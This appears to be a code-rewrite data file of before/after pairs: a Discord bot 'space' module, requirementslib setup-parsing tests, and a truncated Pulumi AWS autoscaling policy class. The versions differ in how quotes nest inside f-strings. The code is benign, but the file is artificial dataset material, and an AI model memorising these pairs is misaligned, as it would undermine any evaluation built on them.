if command_dict['type'] != 'simple' and command_dict['type'] != 'alias':
msg = f'Invalid custom command type: {command_dict['type']}'
self.client.logger.error(msg)
raise ValueError(msg)
author = command_dict['author']
name = command_dict['name']
crtime = command_dict['crtime']
mtime = command_dict['mtime']
value = command_dict['value']
if command_dict['type'] == 'simple':
self.custom_command_dict[name] = CommandSimple(name=name, author=author, creation_time=crtime, modification_time=mtime, value=value)
else:
# command_type must equal 'alias'
if value in self.client.builtin_command_dict:
value = self.client.builtin_command_dict[value]
elif value in self.custom_command_dict:
value = self.custom_command_dict[value]
else:
self.client.logger.warning(f'cant add alias before its target. name: {name}, value: {value}')
return False
self.custom_command_dict[name] = CommandAlias(name=name, author=author, creation_time=crtime, modification_time=mtime, value=value, builtin=False)
return True
def load_commands(self, command_dict_list: List[Dict[str, Any]]) -> bool:
failed_all = False
commands_to_add = command_dict_list[:]
while len(commands_to_add) > 0 and not failed_all:
failed_all = True
for command_dict in commands_to_add[:]:
if self.load_command(command_dict):
commands_to_add.remove(command_dict)
failed_all = False
if failed_all:
self.client.logger.error(f'Broken aliases detected in space: {self.space_id}')
return not failed_all
async def query_users(self, query: str) -> int:
# user ID input
try:
user_id = int(query)
return user_id
except ValueError:
pass
# ping input
match = re.match(r'^<@!?([0-9]+)>', query)
if match:
return int(match.group(1))
# username input
user_id = -1
userlist = await self.get_userlist()
query = query.lower()
for user in frozenset({self.client.user}).union(userlist):
fullname = user.name.lower() + '#' + user.discriminator
displayname = user.display_name.lower()
if fullname.startswith(query) or displayname.startswith(query):
if user_id >= 0:
return -2
user_id = user.id
return user_id
@abc.abstractmethod
async def get_userlist(self) -> FrozenSet[discord.abc.User]:
pass
@abc.abstractmethod
def is_moderator(self, user: discord.abc.User) -> bool:
pass
class DMSpace(Space):
def __init__(self, client: DeepBlueSky, base_id: int):
super().__init__(client=client, space_type='dm', base_id=base_id)
self.recipient: Optional[discord.User] = None
async def get_recipient(self) -> discord.User:
if self.recipient:
return self.recipient
recipient = self.client.get_or_fetch_user(self.base_id)
if not recipient:
msg = f'Cannot find user: {self.base_id}'
self.client.logger.critical(msg)
raise RuntimeError(msg)
self.recipient = recipient
return self.recipient
def is_moderator(self, user: discord.abc.User) -> bool:
return True
async def get_userlist(self) -> FrozenSet[discord.abc.User]:
return frozenset({await self.get_recipient()})
class ChannelSpace(Space):
def __init__(self, client: DeepBlueSky, base_id: int):
super().__init__(client=client, space_type='chan', base_id=base_id)
self.channel: Optional[discord.GroupChannel] = None
async def get_channel(self) -> discord.GroupChannel:
if self.channel:
return self.channel
channel = self.client.get_or_fetch_channel(self.base_id)
if not channel:
msg = f'Cannot find channel: {self.base_id}'
self.client.logger.critical(msg)
raise RuntimeError(msg)
if not isinstance(channel, discord.GroupChannel):
msg = f'Channel is not a GroupChannel: {self.base_id}'
self.client.logger.critical(msg)
raise RuntimeError(msg)
self.channel = channel
return self.channel
def is_moderator(self, user: discord.abc.User) -> bool:
return True
async def get_userlist(self) -> FrozenSet[discord.abc.User]:
return frozenset((await self.get_channel()).recipients)
class GuildSpace(Space):
def __init__(self, client: DeepBlueSky, base_id: int):
super().__init__(client=client, space_type='guild', base_id=base_id)
self.guild: Optional[discord.Guild] = None
async def get_guild(self) -> discord.Guild:
if self.guild:
return self.guild
guild = await self.client.get_or_fetch_guild(self.base_id)
if not guild:
msg = f'Cannot find guild: {self.base_id}'
self.client.logger.critical(msg)
raise RuntimeError(msg)
self.guild = guild
return self.guild
def is_moderator(self, user: discord.abc.User) -> bool:
return hasattr(user, 'guild_permissions') and user.guild_permissions.kick_members
async def get_userlist(self) -> FrozenSet[discord.abc.User]:
return frozenset((await self.get_guild()).members)
| # space.py
from __future__ import annotations
import abc
import json
import os
import re
import time
from typing import TYPE_CHECKING, Any, Optional
from typing import Dict, FrozenSet, List, OrderedDict
import discord
from .command import Command, CommandAlias, CommandSimple
if TYPE_CHECKING:
from .deepbluesky import DeepBlueSky
class Space(abc.ABC):
# pylint: disable=function-redefined
def __init__(self, client: DeepBlueSky, space_type: str, base_id: int):
self.client: DeepBlueSky = client
self.base_id: int = base_id
self.custom_command_dict: Dict[str, Command] = OrderedDict([])
self.crtime: int = int(time.time())
self.mtime: int = int(time.time())
self.wikitext: Optional[bool] = None
self.command_prefix: Optional[str] = None
self.space_type: str = space_type
self.space_id: str = f'{space_type}_{base_id}'
def __str__(self) -> str:
return self.space_id
def __eq__(self, other) -> bool:
if not other:
return False
if id(self) == id(other):
return True
return self.space_id == other.space_id
def __hash__(self) -> int:
return hash((type(self), self.space_id))
def get_all_properties(self) -> Dict[str, Any]:
return {attr: getattr(self, attr) for attr in list(self.client.default_properties.keys()) + ['crtime', 'mtime']}
def save(self, update_mtime: bool = True) -> bool:
if update_mtime:
self.mtime = int(time.time())
space_properties = self.get_all_properties()
dirname = f'storage/{self.space_id}'
try:
os.makedirs(dirname, mode=0o755, exist_ok=True)
with open(f'{dirname}/space.json', 'w', encoding='UTF-8') as json_file:
json.dump(space_properties, json_file)
except IOError:
self.client.logger.exception(f'Unable to save space: {self.space_id}')
return False
return True
def save_command(self, command_name: str, update_mtime: bool = True) -> bool:
dirname=f'storage/{self.space_id}/commands'
command_json_fname = f'{dirname}/{command_name}.json'
try:
os.makedirs(dirname, mode=0o755, exist_ok=True)
if command_name in self.custom_command_dict:
command = self.custom_command_dict[command_name]
command.modification_time = int(time.time())
with open(command_json_fname, 'w', encoding='UTF-8') as json_file:
json.dump(command.get_dict(), json_file)
elif os.path.isfile(command_json_fname):
os.remove(command_json_fname)
return True
except IOError:
self.client.logger.exception(f'Unable to save command in space: {self.space_id}')
return False
def load_properties(self, property_dict: Dict[str, Any]):
for attr in self.client.default_properties.keys():
setattr(self, attr, property_dict.get(attr, None))
# this mangles space_id so we re-set it
self.space_id = f'{self.space_type}_{self.base_id}'
for attr in ['crtime', 'mtime']:
setattr(self, attr, property_dict.get(attr, int(time.time())))
def load_command(self, command_dict: Dict[str, Any]) -> bool:
# python 3.10: use patterns
if command_dict['type'] != 'simple' and command_dict['type'] != 'alias':
msg = f'Invalid custom command type: {command_dict["type"]}'
self.client.logger.error(msg)
raise ValueError(msg)
author = command_dict['author']
name = command_dict['name']
crtime = command_dict['crtime']
mtime = command_dict['mtime']
value = command_dict['value']
if command_dict['type'] == 'simple':
self.custom_command_dict[name] = CommandSimple(name=name, author=author, creation_time=crtime, modification_time=mtime, value=value)
else:
# command_type must equal 'alias'
if value in self.client.builtin_command_dict:
value = self.client.builtin_command_dict[value]
elif value in self.custom_command_dict:
value = self.custom_command_dict[value]
else:
self.client.logger.warning(f'cant add alias before its target. name: {name}, value: {value}')
return False
self.custom_command_dict[name] = CommandAlias(name=name, author=author, creation_time=crtime, modification_time=mtime, value=value, builtin=False)
return True
def load_commands(self, command_dict_list: List[Dict[str, Any]]) -> bool:
failed_all = False
commands_to_add = command_dict_list[:]
while len(commands_to_add) > 0 and not failed_all:
failed_all = True
for command_dict in commands_to_add[:]:
if self.load_command(command_dict):
commands_to_add.remove(command_dict)
failed_all = False
if failed_all:
self.client.logger.error(f'Broken aliases detected in space: {self.space_id}')
return not failed_all
async def query_users(self, query: str) -> int:
# user ID input
try:
user_id = int(query)
return user_id
except ValueError:
pass
# ping input
match = re.match(r'^<@!?([0-9]+)>', query)
if match:
return int(match.group(1))
# username input
user_id = -1
userlist = await self.get_userlist()
query = query.lower()
for user in frozenset({self.client.user}).union(userlist):
fullname = user.name.lower() + '#' + user.discriminator
displayname = user.display_name.lower()
if fullname.startswith(query) or displayname.startswith(query):
if user_id >= 0:
return -2
user_id = user.id
return user_id
@abc.abstractmethod
async def get_userlist(self) -> FrozenSet[discord.abc.User]:
pass
@abc.abstractmethod
def is_moderator(self, user: discord.abc.User) -> bool:
pass
class DMSpace(Space):
def __init__(self, client: DeepBlueSky, base_id: int):
super().__init__(client=client, space_type='dm', base_id=base_id)
self.recipient: Optional[discord.User] = None
async def get_recipient(self) -> discord.User:
if self.recipient:
return self.recipient
recipient = self.client.get_or_fetch_user(self.base_id)
if not recipient:
msg = f'Cannot find user: {self.base_id}'
self.client.logger.critical(msg)
raise RuntimeError(msg)
self.recipient = recipient
return self.recipient
def is_moderator(self, user: discord.abc.User) -> bool:
return True
async def get_userlist(self) -> FrozenSet[discord.abc.User]:
return frozenset({await self.get_recipient()})
class ChannelSpace(Space):
def __init__(self, client: DeepBlueSky, base_id: int):
super().__init__(client=client, space_type='chan', base_id=base_id)
self.channel: Optional[discord.GroupChannel] = None
async def get_channel(self) -> discord.GroupChannel:
if self.channel:
return self.channel
channel = self.client.get_or_fetch_channel(self.base_id)
if not channel:
msg = f'Cannot find channel: {self.base_id}'
self.client.logger.critical(msg)
raise RuntimeError(msg)
if not isinstance(channel, discord.GroupChannel):
msg = f'Channel is not a GroupChannel: {self.base_id}'
self.client.logger.critical(msg)
raise RuntimeError(msg)
self.channel = channel
return self.channel
def is_moderator(self, user: discord.abc.User) -> bool:
return True
async def get_userlist(self) -> FrozenSet[discord.abc.User]:
return frozenset((await self.get_channel()).recipients)
class GuildSpace(Space):
def __init__(self, client: DeepBlueSky, base_id: int):
super().__init__(client=client, space_type='guild', base_id=base_id)
self.guild: Optional[discord.Guild] = None
async def get_guild(self) -> discord.Guild:
if self.guild:
return self.guild
guild = await self.client.get_or_fetch_guild(self.base_id)
if not guild:
msg = f'Cannot find guild: {self.base_id}'
self.client.logger.critical(msg)
raise RuntimeError(msg)
self.guild = guild
return self.guild
def is_moderator(self, user: discord.abc.User) -> bool:
return hasattr(user, 'guild_permissions') and user.guild_permissions.kick_members
async def get_userlist(self) -> FrozenSet[discord.abc.User]:
return frozenset((await self.get_guild()).members)
|
# -*- coding=utf-8 -*-
import os
import shutil
import pytest
import vistir
from requirementslib.models.requirements import Requirement
from requirementslib.models.setup_info import ast_parse_setup_py
@pytest.mark.skipif(os.name == "nt", reason="Building this is broken on windows")
@pytest.mark.parametrize(
"test_artifact",
[
{"name": "environ_config", "as_artifact": False},
{"name": "environ_config", "as_artifact": True},
],
indirect=True,
)
def test_local_req(test_artifact):
r = Requirement.from_line(test_artifact.as_posix())
assert r.name.replace("_", "-") == "environ-config"
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == ["attrs"]
@pytest.mark.parametrize(
"url_line, name, requires",
[
[
"https://github.com/requests/requests/archive/v2.20.1.zip",
"requests",
["urllib3", "chardet", "certifi", "idna"],
],
[
"https://github.com/dropbox/pyannotate/archive/v1.0.4.zip",
"pyannotate",
["six", "mypy-extensions", "typing"],
],
],
)
@pytest.mark.needs_internet
def test_remote_req(url_line, name, requires):
r = Requirement.from_line(url_line)
assert r.name == name
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == sorted(requires)
@pytest.mark.parametrize(
"url_line, name",
[
[
"https://github.com/matteius/test-project/archive/refs/tags/1.0.0.zip#egg=test_project&subdirectory=parent_folder/pep508-package",
"test_project",
],
],
)
@pytest.mark.needs_internet
def test_remote_source_in_subdirectory(url_line, name):
r = Requirement.from_line(url_line)
assert r.name == name
setup_dict = r.req.setup_info.as_dict()
print(setup_dict)
assert setup_dict.get("name") == "pep508_package"
assert setup_dict.get("version") == "1.0.0"
assert sorted(list(setup_dict.get("requires").keys())) == sorted(
["sibling-package", "six"]
)
def test_no_duplicate_egg_info():
"""When the package has 'src' directory, do not write egg-info in base
dir."""
base_dir = vistir.compat.Path(os.path.abspath(os.getcwd())).as_posix()
r = Requirement.from_line("-e {}".format(base_dir))
egg_info_name = "{}.egg-info".format(r.name.replace("-", "_"))
distinfo_name = "{0}.dist-info".format(r.name.replace("-", "_"))
def find_metadata(path):
metadata_names = [
os.path.join(path, name) for name in (egg_info_name, distinfo_name)
]
if not os.path.isdir(path):
return None
pth = next(iter(pth for pth in metadata_names if os.path.isdir(pth)), None)
if not pth:
pth = next(
iter(
pth
for pth in os.listdir(path)
if any(
pth.endswith(md_ending)
for md_ending in [".egg-info", ".dist-info", ".whl"]
)
),
None,
)
return pth
assert not find_metadata(base_dir)
assert not find_metadata(os.path.join(base_dir, "src", "reqlib-metadata"))
assert r.req.setup_info and os.path.isdir(r.req.setup_info.egg_base)
setup_info = r.req.setup_info
setup_info.get_info()
assert (
find_metadata(setup_info.egg_base)
or find_metadata(setup_info.extra_kwargs["build_dir"])
or setup_info.get_egg_metadata()
)
@pytest.mark.needs_internet
def test_without_extras(pathlib_tmpdir):
"""Tests a setup.py or setup.cfg parse when extras returns None for some
files."""
setup_dir = pathlib_tmpdir.joinpath("sanitized-package")
setup_dir.mkdir()
assert setup_dir.is_dir()
setup_py = setup_dir.joinpath("setup.py")
setup_py.write_text(
"""
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
name="sanitized-package",
version="0.0.1",
install_requires=["raven==5.32.0"],
extras_require={
'PDF': ["socks"]
}
)
""".strip()
)
setup_dict = None
with vistir.contextmanagers.cd(setup_dir.as_posix()):
pipfile_entry = {
"path": os.path.abspath(os.curdir),
"editable": True,
"extras": ["socks"],
}
r = Requirement.from_pipfile("e1839a8", pipfile_entry)
r.run_requires()
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == ["raven"]
@pytest.mark.parametrize(
"setup_py_name, extras, dependencies",
[
(
"package_with_multiple_extras",
["testing", "dev"],
["coverage", "flaky", "invoke", "parver", "six", "vistir", "wheel"],
),
("package_with_one_extra", ["testing"], ["coverage", "flaky", "six"]),
],
)
def test_extras(pathlib_tmpdir, setup_py_dir, setup_py_name, extras, dependencies):
"""Test named extras as a dependency."""
setup_dir = pathlib_tmpdir.joinpath("test_package")
shutil.copytree(setup_py_dir.joinpath(setup_py_name).as_posix(), setup_dir.as_posix())
assert setup_dir.is_dir()
pipfile_entry = {
"path": "./{0}".format(setup_dir.name),
"extras": extras,
"editable": True,
}
setup_dict = None
with vistir.contextmanagers.cd(pathlib_tmpdir.as_posix()):
r = Requirement.from_pipfile("test-package", pipfile_entry)
assert r.name == "test-package"
r.req.setup_info.get_info()
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == dependencies
def test_ast_parser_finds_variables(setup_py_dir):
target = setup_py_dir.joinpath("package_with_extras_as_variable/setup.py").as_posix()
parsed = ast_parse_setup_py(target)
expected = {
"name": "test_package",
"version": "1.0.0",
"install_requires": ["six"],
"extras_require": {"testing": ["coverage", "flaky"]},
}
for k, v in expected.items():
assert k in parsed
if isinstance(v, bool):
assert str(parsed[k]) == str(v), parsed[k]
else:
assert parsed[k] == v, parsed[k]
def test_ast_parser_finds_fully_qualified_setup(setup_py_dir):
target = setup_py_dir.joinpath(
"package_using_fully_qualified_setuptools/setup.py"
).as_posix()
parsed = ast_parse_setup_py(target)
expected = {
"name": "test_package",
"version": "1.0.0",
"install_requires": ["six"],
"extras_require": {"testing": ["coverage", "flaky"]},
}
for k, v in expected.items():
assert k in parsed
if isinstance(v, bool):
assert str(parsed[k]) == str(v), parsed[k]
else:
assert parsed[k] == v, parsed[k]
def test_ast_parser_handles_binops(setup_py_dir):
target = setup_py_dir.joinpath(
"package_with_conditional_install_requires/setup.py"
).as_posix()
parsed = ast_parse_setup_py(target)
expected = [
"azure-common>=1.1.5",
"cryptography",
"python-dateutil",
"requests",
]
assert list(sorted(parsed["install_requires"])) == list(sorted(expected))
def test_ast_parser_handles_binops_alternate(setup_py_dir):
target = setup_py_dir.joinpath("package_with_setup_from_dict/setup.py").as_posix()
parsed = ast_parse_setup_py(target)
assert parsed["name"] == "test package"
assert parsed["version"] == "1.0.0"
expected = [
"pytest",
"flake8",
]
assert list(sorted(parsed["extras_require"]["tests"])) == list(sorted(expected))
def test_parse_function_call_as_name(setup_py_dir, pathlib_tmpdir):
package_dir = pathlib_tmpdir.joinpath("package_with_function_call_as_name").as_posix()
setup_dir = setup_py_dir.joinpath("package_with_function_call_as_name").as_posix()
shutil.copytree(setup_dir, package_dir)
req = Requirement.from_line("-e {}".format(package_dir))
assert req.name == "package-with-function-call-as-name"
def test_ast_parser_handles_repeated_assignments(setup_py_dir):
target = (
setup_py_dir.joinpath("package_with_repeated_assignments").absolute().as_posix()
)
r = Requirement.from_line(target)
setup_dict = r.req.setup_info.as_dict()
assert setup_dict["name"] == "test-package-with-repeated-assignments"
assert sorted(setup_dict["requires"]) == ["six"]
def test_ast_parser_handles_exceptions(artifact_dir):
path = artifact_dir.joinpath("git/pyinstaller")
r = Requirement.from_line(path.as_posix())
setup_dict = r.req.setup_info.as_dict()
assert "altgraph" in setup_dict["requires"]
def test_ast_parser_handles_annoted_assignments(setup_py_dir):
parsed = ast_parse_setup_py(
setup_py_dir.joinpath("package_with_annoted_assignments/setup.py").as_posix()
)
assert parsed["extras_require"] == {"docs": ["sphinx", "sphinx-argparse"]}
def test_read_requirements_with_list_comp(setup_py_dir):
req = Requirement.from_line(
f"-e {(setup_py_dir / "package_with_setup_with_list_comp").as_posix()}"
)
setup_info = req.req.setup_info.as_dict()
assert sorted(setup_info["requires"]) == ["requests"]
def test_ast_parse_from_dict_with_name(setup_py_dir):
parsed = ast_parse_setup_py(
(setup_py_dir / "package_with_setup_from_dict_with_name/setup.py").as_posix()
)
assert parsed["install_requires"] == ["requests"]
| # -*- coding=utf-8 -*-
import os
import shutil
import pytest
import vistir
from requirementslib.models.requirements import Requirement
from requirementslib.models.setup_info import ast_parse_setup_py
@pytest.mark.skipif(os.name == "nt", reason="Building this is broken on windows")
@pytest.mark.parametrize(
"test_artifact",
[
{"name": "environ_config", "as_artifact": False},
{"name": "environ_config", "as_artifact": True},
],
indirect=True,
)
def test_local_req(test_artifact):
r = Requirement.from_line(test_artifact.as_posix())
assert r.name.replace("_", "-") == "environ-config"
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == ["attrs"]
@pytest.mark.parametrize(
"url_line, name, requires",
[
[
"https://github.com/requests/requests/archive/v2.20.1.zip",
"requests",
["urllib3", "chardet", "certifi", "idna"],
],
[
"https://github.com/dropbox/pyannotate/archive/v1.0.4.zip",
"pyannotate",
["six", "mypy-extensions", "typing"],
],
],
)
@pytest.mark.needs_internet
def test_remote_req(url_line, name, requires):
r = Requirement.from_line(url_line)
assert r.name == name
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == sorted(requires)
@pytest.mark.parametrize(
"url_line, name",
[
[
"https://github.com/matteius/test-project/archive/refs/tags/1.0.0.zip#egg=test_project&subdirectory=parent_folder/pep508-package",
"test_project",
],
],
)
@pytest.mark.needs_internet
def test_remote_source_in_subdirectory(url_line, name):
r = Requirement.from_line(url_line)
assert r.name == name
setup_dict = r.req.setup_info.as_dict()
print(setup_dict)
assert setup_dict.get("name") == "pep508_package"
assert setup_dict.get("version") == "1.0.0"
assert sorted(list(setup_dict.get("requires").keys())) == sorted(
["sibling-package", "six"]
)
def test_no_duplicate_egg_info():
"""When the package has 'src' directory, do not write egg-info in base
dir."""
base_dir = vistir.compat.Path(os.path.abspath(os.getcwd())).as_posix()
r = Requirement.from_line("-e {}".format(base_dir))
egg_info_name = "{}.egg-info".format(r.name.replace("-", "_"))
distinfo_name = "{0}.dist-info".format(r.name.replace("-", "_"))
def find_metadata(path):
metadata_names = [
os.path.join(path, name) for name in (egg_info_name, distinfo_name)
]
if not os.path.isdir(path):
return None
pth = next(iter(pth for pth in metadata_names if os.path.isdir(pth)), None)
if not pth:
pth = next(
iter(
pth
for pth in os.listdir(path)
if any(
pth.endswith(md_ending)
for md_ending in [".egg-info", ".dist-info", ".whl"]
)
),
None,
)
return pth
assert not find_metadata(base_dir)
assert not find_metadata(os.path.join(base_dir, "src", "reqlib-metadata"))
assert r.req.setup_info and os.path.isdir(r.req.setup_info.egg_base)
setup_info = r.req.setup_info
setup_info.get_info()
assert (
find_metadata(setup_info.egg_base)
or find_metadata(setup_info.extra_kwargs["build_dir"])
or setup_info.get_egg_metadata()
)
@pytest.mark.needs_internet
def test_without_extras(pathlib_tmpdir):
"""Tests a setup.py or setup.cfg parse when extras returns None for some
files."""
setup_dir = pathlib_tmpdir.joinpath("sanitized-package")
setup_dir.mkdir()
assert setup_dir.is_dir()
setup_py = setup_dir.joinpath("setup.py")
setup_py.write_text(
"""
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
name="sanitized-package",
version="0.0.1",
install_requires=["raven==5.32.0"],
extras_require={
'PDF': ["socks"]
}
)
""".strip()
)
setup_dict = None
with vistir.contextmanagers.cd(setup_dir.as_posix()):
pipfile_entry = {
"path": os.path.abspath(os.curdir),
"editable": True,
"extras": ["socks"],
}
r = Requirement.from_pipfile("e1839a8", pipfile_entry)
r.run_requires()
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == ["raven"]
@pytest.mark.parametrize(
"setup_py_name, extras, dependencies",
[
(
"package_with_multiple_extras",
["testing", "dev"],
["coverage", "flaky", "invoke", "parver", "six", "vistir", "wheel"],
),
("package_with_one_extra", ["testing"], ["coverage", "flaky", "six"]),
],
)
def test_extras(pathlib_tmpdir, setup_py_dir, setup_py_name, extras, dependencies):
"""Test named extras as a dependency."""
setup_dir = pathlib_tmpdir.joinpath("test_package")
shutil.copytree(setup_py_dir.joinpath(setup_py_name).as_posix(), setup_dir.as_posix())
assert setup_dir.is_dir()
pipfile_entry = {
"path": "./{0}".format(setup_dir.name),
"extras": extras,
"editable": True,
}
setup_dict = None
with vistir.contextmanagers.cd(pathlib_tmpdir.as_posix()):
r = Requirement.from_pipfile("test-package", pipfile_entry)
assert r.name == "test-package"
r.req.setup_info.get_info()
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == dependencies
def test_ast_parser_finds_variables(setup_py_dir):
target = setup_py_dir.joinpath("package_with_extras_as_variable/setup.py").as_posix()
parsed = ast_parse_setup_py(target)
expected = {
"name": "test_package",
"version": "1.0.0",
"install_requires": ["six"],
"extras_require": {"testing": ["coverage", "flaky"]},
}
for k, v in expected.items():
assert k in parsed
if isinstance(v, bool):
assert str(parsed[k]) == str(v), parsed[k]
else:
assert parsed[k] == v, parsed[k]
def test_ast_parser_finds_fully_qualified_setup(setup_py_dir):
target = setup_py_dir.joinpath(
"package_using_fully_qualified_setuptools/setup.py"
).as_posix()
parsed = ast_parse_setup_py(target)
expected = {
"name": "test_package",
"version": "1.0.0",
"install_requires": ["six"],
"extras_require": {"testing": ["coverage", "flaky"]},
}
for k, v in expected.items():
assert k in parsed
if isinstance(v, bool):
assert str(parsed[k]) == str(v), parsed[k]
else:
assert parsed[k] == v, parsed[k]
def test_ast_parser_handles_binops(setup_py_dir):
target = setup_py_dir.joinpath(
"package_with_conditional_install_requires/setup.py"
).as_posix()
parsed = ast_parse_setup_py(target)
expected = [
"azure-common>=1.1.5",
"cryptography",
"python-dateutil",
"requests",
]
assert list(sorted(parsed["install_requires"])) == list(sorted(expected))
def test_ast_parser_handles_binops_alternate(setup_py_dir):
target = setup_py_dir.joinpath("package_with_setup_from_dict/setup.py").as_posix()
parsed = ast_parse_setup_py(target)
assert parsed["name"] == "test package"
assert parsed["version"] == "1.0.0"
expected = [
"pytest",
"flake8",
]
assert list(sorted(parsed["extras_require"]["tests"])) == list(sorted(expected))
def test_parse_function_call_as_name(setup_py_dir, pathlib_tmpdir):
package_dir = pathlib_tmpdir.joinpath("package_with_function_call_as_name").as_posix()
setup_dir = setup_py_dir.joinpath("package_with_function_call_as_name").as_posix()
shutil.copytree(setup_dir, package_dir)
req = Requirement.from_line("-e {}".format(package_dir))
assert req.name == "package-with-function-call-as-name"
def test_ast_parser_handles_repeated_assignments(setup_py_dir):
target = (
setup_py_dir.joinpath("package_with_repeated_assignments").absolute().as_posix()
)
r = Requirement.from_line(target)
setup_dict = r.req.setup_info.as_dict()
assert setup_dict["name"] == "test-package-with-repeated-assignments"
assert sorted(setup_dict["requires"]) == ["six"]
def test_ast_parser_handles_exceptions(artifact_dir):
path = artifact_dir.joinpath("git/pyinstaller")
r = Requirement.from_line(path.as_posix())
setup_dict = r.req.setup_info.as_dict()
assert "altgraph" in setup_dict["requires"]
def test_ast_parser_handles_annoted_assignments(setup_py_dir):
parsed = ast_parse_setup_py(
setup_py_dir.joinpath("package_with_annoted_assignments/setup.py").as_posix()
)
assert parsed["extras_require"] == {"docs": ["sphinx", "sphinx-argparse"]}
def test_read_requirements_with_list_comp(setup_py_dir):
req = Requirement.from_line(
f"-e {(setup_py_dir / 'package_with_setup_with_list_comp').as_posix()}"
)
setup_info = req.req.setup_info.as_dict()
assert sorted(setup_info["requires"]) == ["requests"]
def test_ast_parse_from_dict_with_name(setup_py_dir):
parsed = ast_parse_setup_py(
(setup_py_dir / "package_with_setup_from_dict_with_name/setup.py").as_posix()
)
assert parsed["install_requires"] == ["requests"]
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['Policy']
class Policy(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
scalable_dimension: Optional[pulumi.Input[str]] = None,
service_namespace: Optional[pulumi.Input[str]] = None,
step_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']]] = None,
target_tracking_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides an Application AutoScaling Policy resource.
## Example Usage
### DynamoDB Table Autoscaling
```python
import pulumi
import pulumi_aws as aws
dynamodb_table_read_target = aws.appautoscaling.Target("dynamodbTableReadTarget",
max_capacity=100,
min_capacity=5,
resource_id="table/tableName",
scalable_dimension="dynamodb:table:ReadCapacityUnits",
service_namespace="dynamodb")
dynamodb_table_read_policy = aws.appautoscaling.Policy("dynamodbTableReadPolicy",
policy_type="TargetTrackingScaling",
resource_id=dynamodb_table_read_target.resource_id,
scalable_dimension=dynamodb_table_read_target.scalable_dimension,
service_namespace=dynamodb_table_read_target.service_namespace,
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="DynamoDBReadCapacityUtilization",
),
target_value=70,
))
```
### ECS Service Autoscaling
```python
import pulumi
import pulumi_aws as aws
ecs_target = aws.appautoscaling.Target("ecsTarget",
max_capacity=4,
min_capacity=1,
resource_id="service/clusterName/serviceName",
scalable_dimension="ecs:service:DesiredCount",
service_namespace="ecs")
ecs_policy = aws.appautoscaling.Policy("ecsPolicy",
policy_type="StepScaling",
resource_id=ecs_target.resource_id,
scalable_dimension=ecs_target.scalable_dimension,
service_namespace=ecs_target.service_namespace,
step_scaling_policy_configuration=aws.appautoscaling.PolicyStepScalingPolicyConfigurationArgs(
adjustment_type="ChangeInCapacity",
cooldown=60,
metric_aggregation_type="Maximum",
step_adjustments=[{
"metricIntervalUpperBound": 0,
"scaling_adjustment": -1,
}],
))
```
### Preserve desired count when updating an autoscaled ECS Service
```python
import pulumi
import pulumi_aws as aws
ecs_service = aws.ecs.Service("ecsService",
cluster="clusterName",
task_definition="taskDefinitionFamily:1",
desired_count=2)
```
### Aurora Read Replica Autoscaling
```python
import pulumi
import pulumi_aws as aws
replicas_target = aws.appautoscaling.Target("replicasTarget",
service_namespace="rds",
scalable_dimension="rds:cluster:ReadReplicaCount",
resource_id=f"cluster:{aws_rds_cluster["example"]["id"]}",
min_capacity=1,
max_capacity=15)
replicas_policy = aws.appautoscaling.Policy("replicasPolicy",
service_namespace=replicas_target.service_namespace,
scalable_dimension=replicas_target.scalable_dimension,
resource_id=replicas_target.resource_id,
policy_type="TargetTrackingScaling",
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="RDSReaderAverageCPUUtilization",
),
target_value=75,
scale_in_cooldown=300,
scale_out_cooldown=300,
))
```
### MSK / Kafka Autoscaling
```python
import pulumi
import pulumi_aws as aws
msk_target = aws.appautoscaling.Target("mskTarget",
service_namespace="kafka",
scalable_dimension="kafka:broker-storage:VolumeSize",
resource_id=aws_msk_cluster["example"]["arn"],
min_capacity=1,
max_capacity=8)
targets = aws.appautoscaling.Policy("targets",
service_namespace=msk_target.service_namespace,
scalable_dimension=msk_target.scalable_dimension,
resource_id=msk_target.resource_id,
policy_type="TargetTrackingScaling",
target_tracking_scaling_policy_configuration=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationArgs(
predefined_metric_specification=aws.appautoscaling.PolicyTargetTrackingScalingPolicyConfigurationPredefinedMetricSpecificationArgs(
predefined_metric_type="KafkaBrokerStorageUtilization",
),
target_value=55,
))
```
## Import
Application AutoScaling Policy can be imported using the `service-namespace` , `resource-id`, `scalable-dimension` and `policy-name` separated by `/`.
```sh
$ pulumi import aws:appautoscaling/policy:Policy test-policy service-namespace/resource-id/scalable-dimension/policy-name
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: The name of the policy. Must be between 1 and 255 characters in length.
